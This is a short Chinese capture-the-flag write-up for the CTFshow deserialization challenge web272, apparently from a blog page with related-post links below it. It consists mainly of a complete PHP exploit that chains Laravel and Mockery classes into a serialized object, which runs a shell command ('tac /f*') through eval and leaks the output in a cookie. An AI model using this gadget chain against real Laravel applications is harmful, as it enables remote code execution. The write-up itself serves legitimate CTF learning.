CTFshow 反序列化 web272
目录
- 题解
- 总结
题解
之前的链子用不了了直接拿群里的
exp
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2021-05-05 22:27:03
# @Last Modified by: h1xa
# @Last Modified time: 2021-05-05 22:39:17
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/namespace PhpParser\Node\Scalar\MagicConst{class Line {}
}
namespace Mockery\Generator{class MockDefinition{protected $config;protected $code;public function __construct($config, $code){$this->config = $config;$this->code = $code;}}
}
namespace Mockery\Loader{class EvalLoader{}
}
namespace Illuminate\Bus{class Dispatcher{protected $queueResolver;public function __construct($queueResolver){$this->queueResolver = $queueResolver;}}
}
namespace Illuminate\Foundation\Console{class QueuedCommand{public $connection;public function __construct($connection){$this->connection = $connection;}}
}
namespace Illuminate\Broadcasting{class PendingBroadcast{protected $events;protected $event;public function __construct($events, $event){$this->events = $events;$this->event = $event;}}
}
namespace{$line = new PhpParser\Node\Scalar\MagicConst\Line();$mockdefinition = new Mockery\Generator\MockDefinition($line,"<?php setcookie('shell',shell_exec('tac /f*')); ?>");$evalloader = new Mockery\Loader\EvalLoader();$dispatcher = new Illuminate\Bus\Dispatcher(array($evalloader,'load'));$queuedcommand = new Illuminate\Foundation\Console\QueuedCommand($mockdefinition);$pendingbroadcast = new Illuminate\Broadcasting\PendingBroadcast($dispatcher,$queuedcommand);echo urlencode(serialize($pendingbroadcast));
}
flag在cookie里
总结
…
CTFshow 反序列化 web272相关推荐
- ctfshow 反序列化篇(下)
web267(yii框架) 开启靶机,是一个网站,试着搜索有没有重要信息.在这里发现是yii框架. 我们使用弱口令admin/admin就可以登录进来了,那就继续收集重要信息.在源代码中发现了重要注释 ...
- CTFshow 反序列化 web266
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-04 23:52:24 # ...
- CTFshow 反序列化 web259
目录 源码 思路 题解 总结 源码 <?phphighlight_file(__FILE__);$vip = unserialize($_GET['vip']); //vip can get f ...
- CTFshow 反序列化 web277
目录 源码 题解 总结 源码 查看源代码 提示pickle,得知考点是pickle反序列化 题解 exp 试了几次不能用bash,最后用了/bin/sh,因为环境里面没有装bash,得不到响应nc连上 ...
- CTFshow 反序列化 web261
目录 源码 思路 题解 总结 源码 <?phphighlight_file(__FILE__);class ctfshowvip{public $username;public $passwor ...
- CTFshow 反序列化 web260
目录 源码 思路 题解 总结 源码 <?phperror_reporting(0); highlight_file(__FILE__); include('flag.php');if(preg_ ...
- CTFshow 反序列化 web262
目录 源码 思路 题解 解法一 直接构造类进行序列化 解法二 字符逃逸 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date ...
- CTFshow 反序列化 web263
目录 源码 思路 题解 总结 源码 也没有什么别的信息,扫一下目录,下载www.zip拿到源码 思路 知识点: php在session存储和读取时,都会有一个序列化和反序列化的过程,PHP内置了多种处 ...
- CTFshow 反序列化 web258
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # ...
最新文章
- Everyday English
- 2021-01-28 粒子群优化算法-Python版本和Matlab函数 particleswarm 调用
- excel 插入图片 NPOI
- 【错误解决】[Maven] cannot be opened because it does not exist错误[文件无法编译到target目录下的解决方法]...
- android 仿qq it蓝豹,《IT蓝豹》listview实现各种版面设计功能
- vue限制只能输入数字_vue的input中,如何限制只能输入number
- php文件夹重命名,PHP自动重命名文件实现方法
- 出现无效字符_网站出现死链的原因分析 - 最蜘蛛池租用
- brighthouse mysql_MySQL 数据库中的数据页合并-爱可生
- 世界国家中英文名称以及地区区号json格式
- 【2022最新Java面试宝典】—— Java基础知识面试题(91道含答案)
- 2020最新省市区县编码
- java答题软件_非常实用的java自动答题计时计分器
- android xml pid vid,关于Android机型的pid vid的那些破事儿
- 2018年湖南省高中数学联赛(A)卷试题
- Bmob后端云学习(未完)
- 阿里天池龙珠计划-SQL训练营-Task06
- 使用Quagga测试Neutron BGP动态路由(by quqi99)
- 阿里云服务器ICP备案流程概述
- 用layui创建表格